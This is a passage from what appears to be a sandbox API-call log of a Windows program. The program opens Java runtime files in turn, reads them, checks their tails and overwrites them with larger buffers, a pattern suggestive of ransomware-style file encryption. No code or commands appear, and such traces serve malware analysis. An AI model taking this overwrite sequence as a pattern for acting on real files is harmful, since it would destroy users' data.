lpNumberOfBytesWritten=0x2e9f2d0*=0x14e0, lpOverlapped=0x0) returned 1 [0128.328] CloseHandle (hObject=0x1d4) returned 1 [0128.331] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0128.346] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.346] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xaa77c [0128.346] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.346] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.346] ReleaseMutex (hMutex=0x168) returned 1 [0128.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansRegular.ttf", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0128.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaSansRegular.ttf", cchWideChar=21, lpMultiByteStr=0x1f8867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaSansRegular.ttf", lpUsedDefaultChar=0x0) returned 21 [0128.346] ReadFile (in: hFile=0x1d4, lpBuffer=0x28ad9a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.350] ReadFile (in: hFile=0x1d4, lpBuffer=0x28ad9a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.350] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa977c [0128.351] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.352] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa977c [0128.353] WriteFile (in: hFile=0x1d4, lpBuffer=0x2866f58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.353] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0128.353] WriteFile (in: hFile=0x1d4, lpBuffer=0x28ad9a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.353] WriteFile (in: hFile=0x1d4, lpBuffer=0x28ad9a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.353] CloseHandle (hObject=0x1d4) returned 1 [0128.354] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0128.355] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.355] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa8 [0128.355] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.355] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.356] ReleaseMutex (hMutex=0x168) returned 1 [0128.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0128.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="win32_LinkDrop32x32.gif", cchWideChar=23, lpMultiByteStr=0x1f8867c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="win32_LinkDrop32x32.gif", lpUsedDefaultChar=0x0) returned 23 [0128.356] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f37d58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37d58*, lpNumberOfBytesRead=0x2e9f2bc*=0xa8, lpOverlapped=0x0) returned 1 [0128.357] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0128.357] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x630, lpOverlapped=0x0) returned 1 [0128.357] CloseHandle (hObject=0x1d4) returned 1 [0128.357] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\profile.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0128.359] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.359] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4863 [0128.359] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.359] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.359] ReleaseMutex (hMutex=0x168) returned 1 [0128.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profile.jfc", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0128.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profile.jfc", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="profile.jfc", lpUsedDefaultChar=0x0) returned 11 [0128.359] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.361] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3863 [0128.361] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.362] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3863 [0128.362] WriteFile (in: hFile=0x1d4, lpBuffer=0x2866f58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.363] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0128.363] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.363] CloseHandle (hObject=0x1d4) returned 1 [0128.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\management.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0128.364] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.364] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3711 [0128.364] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.364] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.364] ReleaseMutex (hMutex=0x168) returned 1 [0128.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management.properties", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0128.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management.properties", cchWideChar=21, lpMultiByteStr=0x1f8867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="management.properties", lpUsedDefaultChar=0x0) returned 21 [0128.364] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.366] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2711 [0128.367] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0128.367] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2711 [0128.368] WriteFile (in: hFile=0x1d4, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0128.368] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0128.368] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0128.368] CloseHandle (hObject=0x1d4) returned 1 [0128.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\resources.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0128.377] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.377] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2562c0 [0128.377] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.377] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.377] ReleaseMutex (hMutex=0x168) returned 1 [0128.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resources.jar", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="resources.jar", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="resources.jar", lpUsedDefaultChar=0x0) returned 13 [0128.377] ReadFile (in: hFile=0x1d4, lpBuffer=0x28ad9a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.380] ReadFile (in: hFile=0x1d4, lpBuffer=0x28ad9a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0128.381] ReadFile (in: hFile=0x1d4, lpBuffer=0x28ad9a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesRead=0x2e9f278*=0x2000, lpOverlapped=0x0) returned 1 [0128.955] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2542c0 [0128.955] ReadFile (in: hFile=0x1d4, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2e9f278*=0x2000, lpOverlapped=0x0) returned 1 [0128.976] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2542c0 [0128.977] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x2e9f28c*=0x2588, lpOverlapped=0x0) returned 1 [0128.978] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0128.978] WriteFile (in: hFile=0x1d4, lpBuffer=0x28e4f08*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28e4f08*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.978] WriteFile (in: hFile=0x1d4, lpBuffer=0x28e4f08*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28e4f08*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0128.978] WriteFile (in: hFile=0x1d4, lpBuffer=0x28e4f08*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28e4f08*, lpNumberOfBytesWritten=0x2e9f28c*=0x2000, lpOverlapped=0x0) returned 1 [0128.979] CloseHandle (hObject=0x1d4) returned 1 [0128.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\local_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0128.982] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.982] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb9b [0128.982] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.982] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.982] ReleaseMutex (hMutex=0x168) returned 1 [0128.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="local_policy.jar", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="local_policy.jar", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="local_policy.jar", lpUsedDefaultChar=0x0) returned 16 [0128.982] ReadFile (in: hFile=0x1d4, lpBuffer=0x2668268, nNumberOfBytesToRead=0xb9b, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2e9f2bc*=0xb9b, lpOverlapped=0x0) returned 1 [0128.990] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0128.990] WriteFile (in: hFile=0x1d4, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1123, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1123, lpOverlapped=0x0) returned 1 [0128.990] CloseHandle (hObject=0x1d4) returned 1 [0128.990] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Asmara" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\asmara"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0128.993] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.993] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x41 [0128.993] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.993] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.993] ReleaseMutex (hMutex=0x168) returned 1 [0128.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Asmara", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0128.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Asmara", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Asmara", lpUsedDefaultChar=0x0) returned 6 [0128.993] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2e9f2bc*=0x41, lpOverlapped=0x0) returned 1 [0128.995] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0128.995] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0128.995] CloseHandle (hObject=0x1f0) returned 1 [0128.995] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\cairo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0128.999] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.999] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x419 [0128.999] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0128.999] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0128.999] ReleaseMutex (hMutex=0x168) returned 1 [0128.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cairo", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cairo", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cairo", lpUsedDefaultChar=0x0) returned 5 [0128.999] ReadFile (in: hFile=0x1d4, lpBuffer=0x269c668, nNumberOfBytesToRead=0x419, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2e9f2bc*=0x419, lpOverlapped=0x0) returned 1 [0129.002] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.002] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9a1, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x9a1, lpOverlapped=0x0) returned 1 [0129.002] CloseHandle (hObject=0x1d4) returned 1 [0129.002] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\El_Aaiun" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\el_aaiun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0129.003] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.003] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4d [0129.003] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.003] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 